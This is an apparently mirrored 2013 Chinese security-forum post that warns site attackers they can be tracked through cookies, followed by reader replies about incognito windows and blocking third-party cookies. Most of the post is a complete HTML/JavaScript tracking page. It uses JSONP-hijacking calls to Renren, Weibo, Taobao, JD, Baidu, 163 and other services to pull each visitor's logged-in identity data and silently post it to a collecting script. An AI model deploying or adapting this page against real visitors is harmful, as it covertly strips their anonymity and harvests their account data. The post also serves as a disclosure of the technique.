WooYun Zone镜像——注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪

admin 7月前 137

追踪代码

<html>

<head>

<title>test</title>

</head>

<body>

<strong>It works</strong>

<script type="text/javascript">

// Page-level constants appended to every upload by SendDataToServer (the 'pid=' and
// 'random=' form fields). Presumably they identify this particular copy of the page on
// the collecting side; confirm against SaveInfo.php, which is not part of this listing.
var pid = 20130906003345;

var random = 60113;

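/**
 * Serialises a value into a crude nested "{ key=value }" text form.
 *
 * Non-objects are returned unchanged. Note that typeof null is 'object', so
 * null is walked like an empty object and yields '{  }'. Objects are walked
 * with for...in, so inherited enumerable properties are included too.
 *
 * In this page the result is the payload that ProcessDataInner encodes and
 * hands to SendDataToServer, i.e. whatever a JSONP endpoint returned.
 *
 * @param {*} obj - value to serialise
 * @returns {*} the string form for objects, otherwise obj itself
 */
function GetObjString(obj) {
  if (typeof obj !== 'object') {
    return obj;
  }
  var retstr = '{ ';
  // Declared locally: the original left `fld` undeclared, which created an
  // implicit global and is a ReferenceError under strict mode (ES modules).
  for (var fld in obj) {
    retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n";
  }
  retstr += ' }';
  return retstr;
}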

// Relays one JSONP payload to the collector: serialise it, percent-encode it with the
// legacy escape() function, then post it tagged with the numeric subject.
// escape() is deprecated: it leaves '@*_+-./' unencoded and turns non-ASCII characters
// into %uXXXX sequences, so the receiving side cannot simply urldecode() the field.
// Whatever arrives there is attacker-controllable and must be treated as untrusted input.
function ProcessDataInner(obj, subject) {
  SendDataToServer(escape(GetObjString(obj)), subject);
}

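/**
 * Returns a new XMLHttpRequest-like object, preferring the native constructor
 * and falling back to the MSXML ActiveX ProgIDs used by old Internet Explorer.
 *
 * The ProgID that worked is cached on createXHR.activeXString so later calls
 * skip the probe. Referring to the function by name instead of through
 * arguments.callee keeps this valid in strict mode, where arguments.callee
 * throws a TypeError.
 *
 * NOTE(review): the probe loop rethrows on the first ProgID that fails, so
 * the remaining entries are never tried. That matches the original behaviour
 * and is deliberately left unchanged here.
 *
 * @returns {XMLHttpRequest|object} a request object
 * @throws {Error} when neither XMLHttpRequest nor ActiveXObject exists, or
 *   when constructing the first ActiveX ProgID fails
 */
function createXHR() {
  if (typeof XMLHttpRequest !== 'undefined') {
    return new XMLHttpRequest();
  }
  if (typeof ActiveXObject === 'undefined') {
    throw new Error("No XHR object available");
  }
  // IE6 and earlier: reuse the ProgID found by an earlier call, if any.
  if (typeof createXHR.activeXString === 'string') {
    return new ActiveXObject(createXHR.activeXString);
  }
  var versions = ["MSXML2.XMLHttp6.0", "MSXML2.XMLHttp3.0", "MSXML2.XMLHttp"];
  for (var i = 0; i < versions.length; i++) {
    try {
      var xhr = new ActiveXObject(versions[i]);
      createXHR.activeXString = versions[i];
      return xhr;
    } catch (ex) {
      throw new Error(ex.toString());
    }
  }
}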

// Uploads one already-encoded record to the collector.
//
// Data    - string produced by ProcessDataInner (GetObjString output passed through escape())
// subject - numeric tag saying which JSONP callback produced the record
//
// The request is an asynchronous POST to the relative URL SaveInfo.php, i.e. the same
// origin as this page, and the body also carries the page-level pid and random values.
// Quirks kept as-is: the readystatechange handler is empty, so success or failure is never
// observed; the second argument to send() is not part of the XHR API and is ignored;
// subject is concatenated into the body without encoding. Nothing here is validated, so
// the receiving script has to treat every field as untrusted input.
//
// Why the data is sensitive at all: judging by their names, the JSONP endpoints loaded
// further down return visitor-specific data (login state, nick, ...) only because the
// browser attaches the visitor's cookies to those third-party script requests, which is
// the point the author's title makes. SameSite cookies, third-party-cookie blocking and
// not exposing user data over JSONP each break this at the source.
function SendDataToServer(Data, subject) {

var req = createXHR();

if (req != null) {

// Empty completion handler: the page never inspects the server's response.
req.onreadystatechange = function() {

if (req.readyState == 4) {}

};

req.open("POST", "SaveInfo.php", true);

req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

req.send('data=' + Data + '&pid=' + pid + '&random=' + random + '&subject=' + subject, false);

}

}

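/**
 * Performs a synchronous request and returns the response body as text.
 * Not referenced anywhere else in this page.
 *
 * The call is synchronous (third argument of open() is false), which blocks
 * the page until the response arrives; browsers deprecate this on the main
 * thread. Exceptions raised by open() or send() are not caught here.
 *
 * @param {string} Url - request URL; null or '' short-circuits to ''
 * @param {string} [Method] - HTTP method; null or '' means 'GET'
 * @param {string} [Data] - body handed to send(); when it is non-null, or the
 *   method is POST, a form-urlencoded Content-Type header is set
 * @returns {string} the response text, or '' when Url is empty or no request
 *   object could be created
 */
function GetDataFromServer(Url, Method, Data) {
  if (Url == null || Url === '') {
    return '';
  }
  var method = (Method == null || Method === '') ? 'GET' : Method;
  // Fixed: the original wrote `new createXHR()`, which would have turned a
  // null return into an empty object and made the null check below useless.
  var req = createXHR();
  if (req == null) {
    return '';
  }
  req.open(method, Url, false);
  if (method === 'POST' || Data != null) {
    req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  }
  req.send(Data);
  return req.responseText;
}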

/** JSONP callback (wired with callback=renren below); relays the response as subject 1. */
function renren(obj) {
  ProcessDataInner(obj, 1);
}

/** JSONP callback (wired with callback=jingdong below); relays the response as subject 2. */
function jingdong(obj) {
  ProcessDataInner(obj, 2);
}

/**
 * JSONP callback (wired with callback=tianya below); relays the second argument as
 * subject 3. The first argument, bl, is accepted but never used.
 */
function tianya(bl, obj) {
  ProcessDataInner(obj, 3);
}

/** JSONP callback (wired with callback=weibo below); relays the response as subject 4. */
function weibo(obj) {
  ProcessDataInner(obj, 4);
}

/**
 * Relays obj as subject 6. Unlike its siblings it is not named in any callback=
 * parameter on this page; the page instead calls ProcessDataInner(getUserName, 6)
 * directly in an inline script, so this function appears to be unused.
 */
function vancl(obj) {
  ProcessDataInner(obj, 6);
}

/** JSONP callback (wired with callback=netease_mail below); relays the response as subject 7. */
function netease_mail(obj) {
  ProcessDataInner(obj, 7);
}

/** JSONP callback (wired with callback=mop below); relays the response as subject 9. */
function mop(obj) {
  ProcessDataInner(obj, 9);
}

/** JSONP callback (wired with callback=taobao_nick below); relays the response as subject 13. */
function taobao_nick(obj) {
  ProcessDataInner(obj, 13);
}

/** JSONP callback (wired with callback=baidu below); relays the response as subject 14. */
function baidu(obj) {
  ProcessDataInner(obj, 14);
}

/** JSONP callback (wired with callback=renren_all below); relays the response as subject 15. */
function renren_all(obj) {
  ProcessDataInner(obj, 15);
}

/**
 * JSONP callback (wired with jsoncallback=jingdong_history below, note the different
 * parameter name); relays the response as subject 16.
 */
function jingdong_history(obj) {
  ProcessDataInner(obj, 16);
}

/** JSONP callback (wired with callback=baidu_all below); relays the response as subject 17. */
function baidu_all(obj) {
  ProcessDataInner(obj, 17);
}

</script>

<script src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=renren"></script>

<script src="http://passport.360top.com/call/checkHello?callback=jingdong"></script>

<script src="http://passport.tianya.cn/online/checkuseronline.jsp?callback=tianya"></script>

<script src="http://weibo.com/ajaxlogin.php?fmelogin=1&callback=weibo"></script>

<script src="http://my.vancl.com/user/getusernamebycookie?vancl"></script>

<script>ProcessDataInner(getUserName,6);</script>

<script src="http://mailfriends.mail.163.com/mailfriends/webApi.do?json={"event":"logon"}&callback=netease_mail"></script>

<script src="http://passport.mop.com/common/user-info?callback=mop"></script>

<script src="http://tmm.taobao.com/member/birth_show.do?from=www.tmall.com&callback=taobao_nick"></script>

<script src="http://fm.baidu.com/dev/api/?tn=playlist&format=jsonp&id=1&callback=baidu"></script>

<script src="http://passport.game.renren.com/user/info?callback=renren_all"></script>

<script src="http://my.360buy.com/book/track.action?jsoncallback=jingdong_history"></script>

<script src="http://zhidao.baidu.com/api/loginInfo?callback=baidu_all"></script>

</body>

</html>

你懂的

@核攻击

[原文地址]

相关讨论:

1#

Ivan | 2013-09-08 12:36

搞個快照神馬的……

2#

Hackx7 | 2013-09-08 12:36

好牛逼的样子

3#

无敌L.t.H (:?门安天京北爱我) | 2013-09-08 12:47

拒绝第三方

4#

luom | 2013-09-08 12:49

这尼玛大陷阱啊

5#

Sogili (.) 长短短 () | 2013-09-08 13:29

ctrl+shift+n 打开隐身窗口

6#

liner (/\) | 2013-09-08 13:36

7#

猪猪侠 (A) | 2013-09-08 13:43

很好。

8#

xsser (十根阳具有长短!!) | 2013-09-08 14:24

撸主,百度甚至可以取得关键广告,知道你喜好的哈

9#

safe121 (--黑阔娱乐群:328034840) | 2013-09-08 14:30

@xsser 我在想,chrome的Block third-party cookies and site data是否有效。

感觉这个方法是 Cookie Stuffing

10#

一只猿 (恭喜你又中奖了!!) | 2013-09-08 14:38

@xsser 如何拒绝百度获取,有没有好的方法

11#

x7iao (宇宙黑阔。) | 2013-09-08 16:12

撸主 有接收端吗

12#

想要减肥的胖纸 | 2013-09-08 16:29

我又不做违法的事情。为什么会怕追踪呢。

13#

低调 | 2013-09-08 17:07

@xsser 一般网站联盟连男的女的 多大岁数 文化程度 都能分析出来 呵呵

核攻击 | 2013-09-12 10:49

WTF

